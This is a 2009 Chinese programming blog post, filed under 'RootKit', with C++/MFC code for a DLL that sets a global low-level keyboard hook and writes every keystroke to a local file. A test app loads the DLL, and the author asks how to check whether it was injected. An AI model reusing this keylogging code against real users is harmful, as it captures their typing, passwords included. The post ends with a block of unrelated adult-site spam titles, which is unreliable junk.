• <ins id="pjuwb"></ins>
    <blockquote id="pjuwb"><pre id="pjuwb"></pre></blockquote>
    <noscript id="pjuwb"></noscript>
          <sup id="pjuwb"><pre id="pjuwb"></pre></sup>
            <dd id="pjuwb"></dd>
            <abbr id="pjuwb"></abbr>

            S.l.e!ep.¢%

            像打了激速一樣,以四倍的速度運轉,開心的工作
            簡單、開放、平等的公司文化;尊重個性、自由與個人價值;
            posts - 1098, comments - 335, trackbacks - 0, articles - 1
              C++博客 :: 首頁 :: 新隨筆 :: 聯系 :: 聚合  :: 管理

            About ShutDown of Windows(四)

            Posted on 2009-11-17 21:54 S.l.e!ep.¢% 閱讀(208) 評論(0)  編輯 收藏 引用 所屬分類: RootKit
            接著 About ShutDown of Windows(三)
            折騰著,沒多大收獲

            Create 了一個 MFC 的DLL

            CHookDLLApp?theApp;

            HHOOK?g_Hook?
            =?NULL;

            LRESULT?CALLBACK?MyKeyHook(
            int?code,?WPARAM?wParam,?LPARAM?lParam)
            {
            #if?(_WIN32_WINNT?<?0x0400)
            /*
            *?Structure?used?by?WH_KEYBOARD_LL
            ????
            */
            ????typedef?
            struct?tagKBDLLHOOKSTRUCT?{
            ????????DWORD???vkCode;
            ????????DWORD???scanCode;
            ????????DWORD???flags;
            ????????DWORD???time;
            ????????DWORD???dwExtraInfo;
            ????}?KBDLLHOOKSTRUCT,?FAR?
            *LPKBDLLHOOKSTRUCT,?*PKBDLLHOOKSTRUCT;
            #endif
            ????
            ????PKBDLLHOOKSTRUCT?kbDLLHOOK?
            =?(PKBDLLHOOKSTRUCT)lParam;
            ????
            ????
            const?char?*info?=?NULL;
            ????
            ????
            if?(wParam?==?WM_KEYDOWN)
            ????????info?
            =?"key?down";????
            ????
            else?if?(wParam?==?WM_KEYUP)
            ????????info?
            =?"key?up";
            ????
            else?if?(wParam?==?WM_SYSKEYDOWN)
            ????????info?
            =?"sys?key?down";????
            ????
            else?if?(wParam?==?WM_SYSKEYUP)
            ????????info?
            =?"sys?key?up";
            ????
            ????FILE
            *?f?=?fopen("hook.txt",?"a+");
            ????
            ????CString?strLog;
            ????strLog.Format(
            "%s?-?vkCode?[%04x],?[%c]?scanCode?[%04x]\n",?info,?kbDLLHOOK->vkCode,?kbDLLHOOK->vkCode,?kbDLLHOOK->scanCode);
            ????
            ????fwrite(strLog,?
            1,?strLog.GetLength(),?f);
            ????fclose(f);
            ????
            ????
            //?always?call?next?hook
            ????return?CallNextHookEx(g_Hook,?code,?wParam,?lParam);
            }??????


            void?Hook()
            {
            ????
            //?TODO:?Add?extra?initialization?here
            #ifndef?WH_KEYBOARD_LL
            #define?WH_KEYBOARD_LL?13
            #endif

            ????g_Hook?
            =?SetWindowsHookEx(WH_KEYBOARD_LL,?MyKeyHook,?AfxGetApp()->m_hInstance,?0);
            ????
            ????
            if(?g_Hook?==?NULL?)
            ????????AfxMessageBox(
            "Failed?to?Set?Hook");

            }

            ;?HookDLL.def?:?Declares?the?module?parameters?for?the?DLL.

            LIBRARY??????
            "HookDLL"
            DESCRIPTION??
            'HookDLL?Windows?Dynamic?Link?Library'

            EXPORTS
            ????;?Explicit?exports?can?go?here
            ????Hook?????????@
            1

            Create 了一個MFC的工程

            BOOL?CHookTestDlg::OnInitDialog()
            {
            ????CDialog::OnInitDialog();

            ????
            //?Add?"About"?menu?item?to?system?menu.

            ????
            //?IDM_ABOUTBOX?must?be?in?the?system?command?range.
            ????ASSERT((IDM_ABOUTBOX?&?0xFFF0)?==?IDM_ABOUTBOX);
            ????ASSERT(IDM_ABOUTBOX?
            <?0xF000);

            ????CMenu
            *?pSysMenu?=?GetSystemMenu(FALSE);
            ????
            if?(pSysMenu?!=?NULL)
            ????{
            ????????CString?strAboutMenu;
            ????????strAboutMenu.LoadString(IDS_ABOUTBOX);
            ????????
            if?(!strAboutMenu.IsEmpty())
            ????????{
            ????????????pSysMenu
            ->AppendMenu(MF_SEPARATOR);
            ????????????pSysMenu
            ->AppendMenu(MF_STRING,?IDM_ABOUTBOX,?strAboutMenu);
            ????????}
            ????}

            ????
            //?Set?the?icon?for?this?dialog.??The?framework?does?this?automatically
            ????
            //??when?the?application's?main?window?is?not?a?dialog
            ????SetIcon(m_hIcon,?TRUE);????????????//?Set?big?icon
            ????SetIcon(m_hIcon,?FALSE);????????//?Set?small?icon
            ????
            ????
            //?TODO:?Add?extra?initialization?here
            #ifndef?WH_KEYBOARD_LL
            ????
            #define?WH_KEYBOARD_LL?13
            #endif
            ????
            //?????g_Hook?=?SetWindowsHookEx(WH_KEYBOARD_LL,?MyKeyHook,?AfxGetApp()->m_hInstance,?0);
            //?????
            //?????if(?g_Hook?==?NULL?)
            //?????????AfxMessageBox("Failed?to?Set?Hook");

            ????TCHAR?szPath[MAX_PATH]?
            =?{0};
            ????GetModuleFileName(NULL,?szPath,?MAX_PATH);
            ????PathRenameExtension(szPath,?_T(
            ""));

            ????typedef?
            void?(*TYPE_pfnLoadLibrary)();
            ????TYPE_pfnLoadLibrary?pfnLoadLibrary?
            =?NULL;

            ????HMODULE?Module?
            =?LoadLibrary(szPath);
            ????pfnLoadLibrary?
            =?(TYPE_pfnLoadLibrary)GetProcAddress(Module,?"Hook");
            ????
            ????pfnLoadLibrary();

            ????
            return?TRUE;??//?return?TRUE??unless?you?set?the?focus?to?a?control
            }

            時間太緊,沒做一些異常判斷處理
            HOOK成功了,用 SysCheck 工具一看, 只看到了 HookTest.exe 里面加載了一個HookDLL.dll

            采用 injecteddll 工具也沒有看到所謂的“注入”DLL

            是否“注入”成功,不得所知
            所謂的“注入”又該怎么看到的呢?明天再解決它。
            久久亚洲欧洲国产综合| 午夜精品久久久久成人| 日本久久久久久中文字幕| 久久久久国色AV免费观看| 国产免费久久精品99re丫y| 日产精品99久久久久久| 亚洲一本综合久久| 精品国产青草久久久久福利| 国产精品久久久久久福利漫画| 一级A毛片免费观看久久精品| 久久精品九九亚洲精品| 久久人人爽人爽人人爽av| 久久久久久午夜成人影院| 怡红院日本一道日本久久 | 99精品国产99久久久久久97| 丰满少妇高潮惨叫久久久| 伊人久久一区二区三区无码| 99久久成人18免费网站| 久久精品国产亚洲av日韩| 伊人久久成人成综合网222| 91精品国产高清久久久久久国产嫩草 | 久久国产精品99精品国产987| 久久人与动人物a级毛片| 国产精自产拍久久久久久蜜| 久久精品国产亚洲av影院| 亚洲va中文字幕无码久久| 伊人热热久久原色播放www| 久久久久亚洲AV无码专区网站| 久久99精品综合国产首页| 久久久久亚洲AV片无码下载蜜桃| 午夜视频久久久久一区| 久久久久久一区国产精品| 久久精品成人国产午夜| 久久99国产精品一区二区| 国产高潮国产高潮久久久| 久久久久久人妻无码| 久久久久久国产精品无码超碰| 天堂久久天堂AV色综合| 欧美黑人激情性久久| 精品蜜臀久久久久99网站| 99久久无色码中文字幕|